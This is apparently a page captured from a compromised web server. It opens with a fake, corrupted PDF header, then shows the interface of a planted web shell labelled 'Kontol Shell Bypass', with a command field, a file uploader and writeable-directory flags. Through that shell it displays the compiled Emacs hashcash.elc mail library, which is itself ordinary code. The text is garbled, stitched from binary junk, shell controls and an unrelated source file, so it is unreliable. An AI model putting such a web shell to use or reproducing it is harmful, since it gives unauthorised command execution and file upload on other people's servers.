%PDF- <> %âãÏÓ endobj 2 0 obj <> endobj 3 0 obj <>/ExtGState<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/Annots[ 28 0 R 29 0 R] /MediaBox[ 0 0 595.5 842.25] /Contents 4 0 R/Group<>/Tabs/S>> endobj ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<> endobj 2 0 obj<>endobj 2 0 obj<>es 3 0 R>> endobj 2 0 obj<> ox[ 0.000000 0.000000 609.600000 935.600000]/Fi endobj 3 0 obj<> endobj 7 1 obj<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI]>>/Subtype/Form>> stream

nadelinn - rinduu

Command :

ikan Uploader :
Directory :  /usr/share/emacs/25.2/lisp/mail/
Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 
Current File : //usr/share/emacs/25.2/lisp/mail/hashcash.elc
;ELC
;;; Compiled
;;; in Emacs version 25.2.1
;;; with all optimizations.

;;; This file uses dynamic docstrings, first added in Emacs 19.29.

;;; This file does not contain utf-8 non-ASCII characters,
;;; and so can be loaded in Emacs versions earlier than 23.

;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;


(byte-code "\302\303\304\305\306\307%\210\310\311\312\313\314\315\306\303&\210\310\316\317\320\314\321\306\303&\210\310\322\312\323\314\315\306\303&\210\310\324\325\326\314\327\306\303&\210\330\331\332\304#\210\333\304\211\203`	@\331N\203Y\332N\204Y\334\332\331N#\210	A\211\204B*\335\331\332\336#\210\310\332\337\340\314\341\306\303&\210\310\342\304\343\314\344\306\303&\210\310\345\346\347\314\350\306\303&\210\310\351\304\352\314\353\306\303&\207" [prop --dolist-tail-- custom-declare-group hashcash nil "Hashcash configuration." :group mail custom-declare-variable hashcash-default-payment 20 "The default number of bits to pay to unknown users.\nIf this is zero, no payment header will be generated.\nSee `hashcash-payment-alist'." :type integer hashcash-payment-alist 'nil "An association list mapping email addresses to payment amounts.\nElements may consist of (ADDR AMOUNT) or (ADDR STRING AMOUNT), where\nADDR is the email address of the intended recipient and AMOUNT is\nthe value of hashcash payment to be made to that user.  STRING, if\npresent, is the string to be hashed; if not present ADDR will be used." (repeat (choice (list :tag "Normal" (string :name "Address") (integer :name "Amount")) (list :tag "Replace hash input" (string :name "Address") (string :name "Hash input") (integer :name "Amount")))) hashcash-default-accept-payment "The default minimum number of bits to accept on incoming payments." hashcash-accept-resources `((,user-mail-address nil)) "An association list mapping hashcash resources to payment amounts.\nResources named here are to be accepted in incoming payments.  If the\ncorresponding AMOUNT is NIL, the value of `hashcash-default-accept-payment'\nis used instead." alist defvaralias hashcash-path hashcash-program (saved-value saved-variable-comment) put make-obsolete-variable "24.4" "hashcash" "The name of the hashcash executable.\nIf this is not in your PATH, specify an absolute file name." (choice (const nil) file) hashcash-extra-generate-parameters "A list of parameter strings passed to `hashcash-program' when minting.\nFor example, you may want to set this to (\"-Z2\") to reduce header length." (repeat string) hashcash-double-spend-database "hashcash.db" "The name of the double-spending database file." file hashcash-in-news "Specifies whether or not hashcash payments should be made to newsgroups." boolean] 9)
#@55 Alist of asynchronous hashcash processes and buffers.
(defvar hashcash-process-alist nil (#$ . 2802))
(byte-code "\300\301!\210\302\303!\203\304\305\303\"\210\202\304\305\306\"\210\302\307!\203%\304\310\307\"\210\202*\304\310\311\"\210\300\207" [require mail-utils fboundp point-at-bol defalias hashcash-point-at-bol line-beginning-position point-at-eol hashcash-point-at-eol line-end-position] 3)
(defalias 'hashcash-strip-quoted-names #[(addr) "\301!\211\203\302\303\"\203\304\305\"\304\306\"P\207\207" [addr mail-strip-quoted-names string-match "\\`\\([^+@]+\\)\\+[^@]*\\(@.+\\)" match-string 1 2] 5])
(defalias 'hashcash-token-substring #[nil "\212\301\3022,`\303 {P\303 b\210\304u\210\305\306!\204 \307\302\"\210\305\306!\203\304u\210\202 *\207" [token "" --cl-block-nil-- hashcash-point-at-eol 1 looking-at "[ 	]" throw] 3])
#@67 Return the hashcash payment value required for the given address.
(defalias 'hashcash-payment-required #[(addr) "\304	\"\305\n8\206\nA@\206)\207" [addr hashcash-payment-alist val hashcash-default-payment assoc 2] 3 (#$ . 3664)])
#@64 Return the string with which hashcash payments should collide.
(defalias 'hashcash-payment-to #[(addr) "\303	\"\211A@\206\n@\206)\207" [addr hashcash-payment-alist val assoc] 4 (#$ . 3906)])
#@67 Generate a hashcash payment by finding a VAL-bit collison on STR.
(defalias 'hashcash-generate-payment #[(str val) "\304V\203+	\203+r\305\306!q\210\307 \210\310\311	\312\313\312\314\315\316\317!\n&\210eb\210\320 )\207\321\322!\207" [val hashcash-program str hashcash-extra-generate-parameters 0 get-buffer-create " *hashcash*" erase-buffer apply call-process nil t "-m" "-q" "-b" number-to-string hashcash-token-substring error "No `hashcash' binary found"] 12 (#$ . 4110)])
#@138 Generate a hashcash payment by finding a VAL-bit collison on STR.
Return immediately.  Call CALLBACK with process and result when ready.
(defalias 'hashcash-generate-payment-async #[(str val callback) "\306V\203.	\203.\307\310\311\312	\313\314\315\316!\n&\n\211pB
B\317\f\320\321\322\323BBE\")\207\312\211\"\207" [val hashcash-program str hashcash-extra-generate-parameters process hashcash-process-alist 0 apply start-process "hashcash" nil "-m" "-q" "-b" number-to-string set-process-filter lambda (process output) funcall (process output) callback] 12 (#$ . 4598)])
#@43 Check the validity of a hashcash payment.
(defalias 'hashcash-check-payment #[(token str val) "\203\305\306\211\211\307\310\311	\312\313\n!\314\f&
\315U\207\316\317!\210\320\321!\210\306\207" [hashcash-program hashcash-double-spend-database val str token call-process nil "-c" "-d" "-f" "-b" number-to-string "-r" 0 message "No hashcash binary found" sleep-for 1] 14 (#$ . 5184)])
#@46 Find the format version of a hashcash token.
(defalias 'hashcash-version #[(token) "\301H\302\232\203\n\303\207\304H\302\232\203\305\207\306\307!\207" [token 1 58 1.2 6 1.1 error "Unknown hashcash format version"] 2 (#$ . 5576)])
#@58 Check for hashcash token to RECIPIENT in current buffer.
(defalias 'hashcash-already-paid-p #[(recipient) "\212\214\303 \210\304\305!\306\211;\205\307\310\n!	\",\207" [case-fold-search token recipient message-narrow-to-headers-or-head message-fetch-field "x-hashcash" t string-match regexp-quote] 4 (#$ . 5817)])
#@64 Insert X-Payment and X-Hashcash headers with a payment for ARG
(defalias 'hashcash-insert-payment #[(arg) "\302!?\205\303\304!\305!\"\211\205\306\307	\310#)\207" [arg pay hashcash-already-paid-p hashcash-generate-payment hashcash-payment-to hashcash-payment-required insert-before-markers "X-Hashcash: " "\n"] 5 (#$ . 6140) "sPay to: "])
#@122 Insert X-Payment and X-Hashcash headers with a payment for ARG
Only start calculation.  Results are inserted when ready.
(defalias 'hashcash-insert-payment-async #[(arg) "\301!?\205\302\303!\304!\305\306\307p\310BBE#\207" [arg hashcash-already-paid-p hashcash-generate-payment-async hashcash-payment-to hashcash-payment-required lambda (process payment) hashcash-insert-payment-async-2 (process payment)] 8 (#$ . 6493) "sPay to: "])
(defalias 'hashcash-insert-payment-async-2 #[(buffer process pay) "\304!\205rq\210\212\214\305	\n\236\n\"\306 \210\205\307\310\"+\207" [buffer process hashcash-process-alist pay buffer-live-p delq message-goto-eoh insert-before-markers "X-Hashcash: "] 3])
#@94 Delete any hashcash processes associated with BUFFER.
BUFFER defaults to the current buffer.
(defalias 'hashcash-cancel-async #[(&optional buffer) "\204p\303\304\n\"\211\205\305	@!\210\306	\n\"\202)\207" [buffer entry hashcash-process-alist nil rassq delete-process delq] 3 (#$ . 7202) nil])
#@102 Wait for asynchronous hashcash processes in BUFFER to finish.
BUFFER defaults to the current buffer.
(defalias 'hashcash-wait-async #[(&optional buffer) "\204p\303\304\n\"\211\205\305	@\306\"\210\202)\207" [buffer entry hashcash-process-alist nil rassq accept-process-output 1] 3 (#$ . 7513) nil])
#@67 Return non-nil if hashcash processes in BUFFER are still running.
(defalias 'hashcash-processes-running-p #[(buffer) "\302	\"\207" [buffer hashcash-process-alist rassq] 3 (#$ . 7828)])
#@60 Ask user whether to wait for hashcash processes to finish.
(defalias 'hashcash-wait-or-cancel #[nil "\300p!\205\301\302!\203\303 \207\304 \207" [hashcash-processes-running-p y-or-n-p "Hashcash process(es) still running; wait for them to finish? " hashcash-wait-async hashcash-cancel-async] 2 (#$ . 8020) nil])
#@27 Verify a hashcash payment
(defalias 'hashcash-verify-payment #[(token &optional resource amount) "\306\307\"\310!\311W\203	A@\2020\312	@!\313\n\314\"\203%\315	8\202/\313\n\316\"\205/\317	8)\f\204R\320
\"\211\205N\321@A@\206M#)\202g\232\203f\321\f\206b#\202g\322*\207" [token split #1=#:temp key resource hashcash-accept-resources split-string ":" hashcash-version 1.2 string-to-number eql 0 2 1 3 assoc hashcash-check-payment nil elt hashcash-default-accept-payment amount] 5 (#$ . 8340)])
#@221 Add X-Payment: and X-Hashcash: headers with a hashcash payment
for each recipient address.  Prefix arg sets default payment temporarily.
Set ASYNC to t to start asynchronous calculation.  (See
`mail-add-payment-async').
(defalias 'mail-add-payment #[(&optional arg async) "\203\n\306!\202	\307\212\214\310 \210\311\312\313\307\314#!\311\312\315\307\314#!\311\312\316\307\314#!\211\2034\317
\320\"\f\203?\n\317\f\320\"\244\203O\203O\n\317\320\"\244+\n\203b\321\203^\322\202_\323\n\"\210,\314\207" [arg hashcash-default-payment addrlist ng cc to prefix-numeric-value nil message-narrow-to-headers hashcash-strip-quoted-names mail-fetch-field "To" t "Cc" "Newsgroups" split-string ",[ 	\n]*" mapc hashcash-insert-payment-async hashcash-insert-payment hashcash-in-news async] 8 (#$ . 8872) "P"])
#@167 Add X-Payment: and X-Hashcash: headers with a hashcash payment
for each recipient address.  Prefix arg sets default payment temporarily.
Calculation is asynchronous.
(defalias 'mail-add-payment-async #[(&optional arg) "\301\302\"\207" [arg mail-add-payment t] 3 (#$ . 9697) "P"])
#@103 Look for a valid X-Payment: or X-Hashcash: header.
Prefix arg sets default accept amount temporarily.
(defalias 'mail-check-payment #[(&optional arg) "\203\n\306!\202	\307\310\311\312\"!\212eb\210\313\314!\210\315 \210`\316eb\210\204J\313\317\f\320#\203J\321\322 \323\"\211@\324\n!\232\203F\325
A@!)\202%eb\210\204b\313\326\f\320#\203b\325\322 !\211\203Q\203j\327\330!\210-\207" [arg hashcash-default-accept-payment version ok end value prefix-numeric-value hashcash-version hashcash-generate-payment "x" 1 search-forward "\n\n" beginning-of-line nil "X-Payment: hashcash " t split-string hashcash-token-substring " " number-to-string hashcash-verify-payment "X-Hashcash: " message "Payment valid"] 6 (#$ . 9985) "P"])
(provide 'hashcash)

Kontol Shell Bypass